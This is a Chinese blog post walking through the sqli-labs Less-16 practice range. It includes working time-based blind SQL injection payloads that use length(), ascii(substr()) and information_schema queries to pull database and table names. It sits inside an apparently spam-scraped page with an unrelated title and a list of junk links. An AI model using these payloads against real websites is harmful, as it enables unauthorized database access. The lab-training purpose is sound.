当前位置: 首页 > news >正文

做简单的企业网站需要学哪些网页传奇游戏修改器

做简单的企业网站需要学哪些,网页传奇游戏修改器,制作网页完整步骤,看片狂人简介 SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中&#x…

简介


        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       

SQL注入的一个简要流程:


1、打开目标靶场

2、选择less - 16

3、确定网站可以注入的参数

本关可以直接在输入框中搜索 

4、判断闭合方式   

本关为 1") #

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如:   1") and if(length(database()=7),sleep(8),1) #

发现没有时间延迟,则数据库长度不为7

最终确定数据库长度为8

6、确定数据名称

可以输入以下代码

  1") and if(ascii(substr(database(),1,1))>114,sleep(5),1) #

以此可以确定第一个字符的ASCII码值为115,字母为s

7、查询数据库中第一张表


查询第一张表的第一个字符

1") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) #

有延时则大于100

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全 

网络安全为人民,网络安全靠人民。

http://www.yayakq.cn/news/449665/

相关文章:

  • 网站开发后台数据库怎么搞seo是什么化学名称
  • 如何提高商城网站权重seo标题是什么
  • wordpress网站变慢咸阳市建设局网站
  • 下载企业网站手机网站制作天强科技
  • html网页制作网站阿里云网站主体变更怎么做
  • 北京天润建设工程有限公司网站网站建设对于企业的意义
  • 好看的企业网站首页WordPress二级栏目代码
  • 移动端网站开发环境潍坊ui设计制作培训
  • 网站建设与管理实训课程合肥瑶海区最新房价
  • 黑色个人网站欣赏wordpress点击分享功能
  • 原平的旅游网站怎么做的怎么才能自己做网站
  • 娱乐网站建设微信网站搭建
  • 网站在线备案服装设计学什么
  • 网站建设起到计划和指导作用搭建创新平台
  • cms 多个网站建网站和建网页的区别
  • 哪个网站可以做英文兼职网站的关键词在哪设置
  • 网站建设维护保密协议有哪些做平面设计好的网站有哪些内容
  • phpstudy怎么做网站厦门的服装商城网站建设
  • 综合网站系统网站什么也没动怎么不收录啦
  • 网站模版怎么样关于网站建设方案
  • 小江网站建设网络营销外包推广系统
  • 进一步加大网站集约化建设力度论坛网站建设视频
  • 免费做优化的网站建设长春比较有名的做网站建设
  • 公路水运建设质量与安全监督系统网站太原自学网站建设
  • 自适应网站平台外贸网站推广上海
  • 公司做网站算什么费用集团网站信息建设情况
  • 北京朝阳网站太原seo团队
  • 中国建设银行网站首页旧版今天的新闻直播
  • 用php做的网站跨境电商主要平台有哪些
  • 微信网页上的网站怎么做的百姓网招聘信息最新招聘